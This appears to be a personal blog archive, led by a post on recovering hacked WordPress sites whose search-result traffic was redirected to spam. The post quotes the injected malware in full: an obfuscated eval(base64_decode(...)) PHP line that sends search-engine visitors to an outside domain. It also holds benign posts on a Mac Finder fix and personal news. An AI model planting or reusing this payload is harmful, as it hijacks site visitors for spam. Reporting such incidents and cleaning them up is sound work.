Tag Archives: Mac Pro

WordPress + Google Search Result links redirected/hijacked/hacked

A couple weeks ago it was brought to my attention that when googling myself and then clicking on the Google search links, users were redirected to various spam websites instead of the actual website they wanted to visit. Since I don’t google myself to visit my personal & freelance websites (I visit them directly by typing the URL into the address bar), I was entirely unaware of this problem.

I started troubleshooting this problem by googling the keywords to all the websites I host. For every WordPress website that I hosted, the google search links were hijacked and redirected to spam sites. For any static HTML pages that I hosted, the google search links took me to the correct website.

This told me that every single one of my WordPress websites had been hacked and infected with a script. In fact, when troubleshooting, I discovered that not only was it the root level (home page) of the site, but all the sitelinks (the sub links shown underneath the main search result) had been infected as well. To me, this meant that the “virus” was at least in the header.php file of the WP install.

Coincidentally, I had just made the decision to switch hosting providers. I have been with BlueHost since June 2009 and honestly have never had any negative experiences. Within the past year, my work had a hugely negative experience with BlueHost. Long story short, all of our websites hosted with them vanished into the aether. This included all of our WordPress installs and our web team’s wiki. Their response to our troubleticket was something along the lines of something blew up, nothing we can do, surely you understand. Fortunately, we do not understand and we do understand that rolling us to a backup is a reasonable expectation that they failed to see or execute. This experience terrifies me since I provide hosting for freelance clients. If their websites vanished one day with NO BACKUP, well… I’d be f’ed. As a consequence of this experience, I waited until my BlueHost hosting plan was close to expiration and then bought new hosting with DreamHost (recommended to me by a few coworkers).

Back to the hacked WordPress sites. I deduced that at the very least my header.php files were hacked, and they likely became that way because of a lack of security with my hosting provider as well as very slightly out of date WordPress installations. I needed to check my WP files on the server and then migrate all my domains and hosting off of BlueHost.

Saturday morning I checked my WP files. I began by checking index.php at the root level of the install and then in the wp-content subdirectories. EVERY SINGLE opening PHP tag was followed by this nastiness:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?>

Then, I checked my header.php file. EVERY SINGLE PHP tag was followed with this code. Literally every time my WP theme opens PHP to use a WP template tag, nasty infection virus code. Literally, metadata, keywords, title, everything, everything.

Obviously I’d been googling to troubleshoot this problem. All the google results were forums, blogs, discussion groups, etc talking about Norton, McAfee, Spider-something, and all other anti-virus software. Well it was obvious to me that the problem was not on my machine (I tested on my work Mac Pro, my home MacBook Pro, and my iPad) but on my server area. My wise husband said, “Hun, put ‘Mac’ on the end of your search.” Goodness sakes that was silly of me. Bam, I throw ‘Mac’ on the end of my search and all of a sudden I see the forums saying that it’s a server problem. That brilliant idea spurred another brilliant idea. I google the nasty infection code (shown above). Looky what I found:
Another poor soul whose WordPress site got hacked. He explains his solution to the problem here.

The bare bones “non-technical” solution that I thought of is to export your WP data to xml then re-import the data on a fresh WordPress installation. The probability of this solution working was confirmed by the link above. A few caveats or things to keep in mind…

  • Change hosting providers, and if you can afford it, opt for private hosting (shared hosting is the cheapest and it’s where they put you on a box with other people). If it happened to you once, it will happen to you again. Hubby suggested that it could be someone else that’s on the same box as me infecting everyone on the box. So even if I deleted my WP installs & did a fresh install, it is possible that the files would get hacked all over again within minutes.
  • Change your theme. All the installed themes are going to be infected too. Luckily I was running a child theme of 2011 and my child theme only had two php files with a small amount of customization. If you must keep the same theme, which I felt like I needed to, remove the virus code from the appropriate files, download locally, and zip up so you have a clean version of the theme you’re running.

The highly technical solution is to run a command line script on the server that finds all the files that have the virus code in them and duplicates all the files but without that code. Then it kills all the files that have the code. My command line juju is severely lacking and I’m terrified of that black box screen. This solution was mentioned in the two posts that guided me (linked above) and the actual script and nitty gritty details can be found here: http://tech.sarathdr.com/featured/wordpress-hacked-redirect-to-gigop-americanunfinished-com

I am ECSTATIC to report that downloading the XML export, downloading my child theme files, editing and then zipping my clean child theme files, changing hosting providers, doing a fresh WordPress install, uploading my XML, and reinstalling my clean child theme left me with a nearly perfect migration of my old website.

The only problem that I experienced is that some of my post images did not migrate over. What I did to work around that was download my entire


folder from my old site and then upload the entire


directory on my new server space. The image URLs within posts no longer returned 404s, woot woot! The only problem is that none of my [gallery] shortcodes work. I thought it was because the images are not linked to the post gallery, but my entire media library is empty. Frankly… I said eff it. Atleast all my data is here, my single images are here, my google search links take users to me, if I lose a few galleries… well that is a price that I am willing to pay.

“The application Finder can’t be opened.”

Grr. This is the second time this has happened to me. I work on Snow Leopard at home and at work, but now twice at work I’ve gotten this fatal message:

“The application Finder can’t be opened.” -10810

Finder error

I can’t remember what I was doing the first time it happened, but when it happened just now, I was attempting to delete 4 or 5 directories on a shared server. The directories were NOT huge; it shouldn’t have crashed Finder. But it did. I had to force quit Finder and then when I tried to open it again, I got that crappy error message.

But I found a solution via the googler.

  1. Open Terminal. For those who are scared to open Terminal, don’t worry I’m in the same boat. I promise it will be okay.
  2. Type this in to Terminal:
    System/Library/CoreServices/Finder.app/Contents/MacOS/Finder &
  3. Hit Enter.
  4. Now the first time I hit enter, my Finder window popped open. I was happy, so I closed the Finder window & Terminal. Then I clicked on Finder in the dock, and I got that damn error again.

    So, second time through, I started over at Step #1 and repeated the process. The second time that I hit enter (Step #3), the Finder window did not open automatically. But the Finder icon in the dock had the bottom light, so I clicked on it and a Finder window popped open. Phew!

    But then I closed Terminal. When you go to close Terminal, it closes your Finder. Boo.

    Third time through, repeat all steps. Finder automatically opens when I hit enter this time. Hit up the googler again to find a fix.

  5. Type this in to Terminal: disown
  6. Hit Enter.
  7. Now close Terminal and your Finder should still stay open.

Wow… That was a huge bear. Hope Apple fixes that bug.

Many thanks to this person:
and this person:

Cool snow leopard video on NYT

Check out this sweet video that describes OS updates with an easy-to-understand visual aesthetic. It focuses on Snow Leopard and why it is so innovative in the world of OS updates. Sweet stuff.

BTW, yesterday Mark went out and bought the Snow Leopard update for our Mac Pro at home. I didn’t have time to check it out when I got off of work yesterday, but he said it’s quite sweet and everything is A LOT faster.

Moving over to a new blog…

Well, Mark and I got married (YAY!!!) and I’m slowly getting all my ducks in a row and changing all of their names, buying new domain names, and moving over all the info, data, and blog posts possible. It’s been a hassle and I just started an hour ago. At least I started changing the fun stuff first, like web stuff, before I really tackle the painful things. Like waiting in line at the Social Security office. And then driving ALL THE WAY ACROSS MADISON to go wait in another line at the DMV. But I don’t planning on tackling the painful things until we return to Wisconsin from Samoa…in one month and 3 days from now. I’m counting down the days until we leave and today it’s at 18 days until we leave for Colorado and 22 days until we leave for Samoa. I need to get a lot of stuff done between now and then, so wish me luck!

Anyways. Here are some ramblings from a blog I had on WordPress about a year ago and then another blog I had on a website I made with iWeb more recently:
Continue reading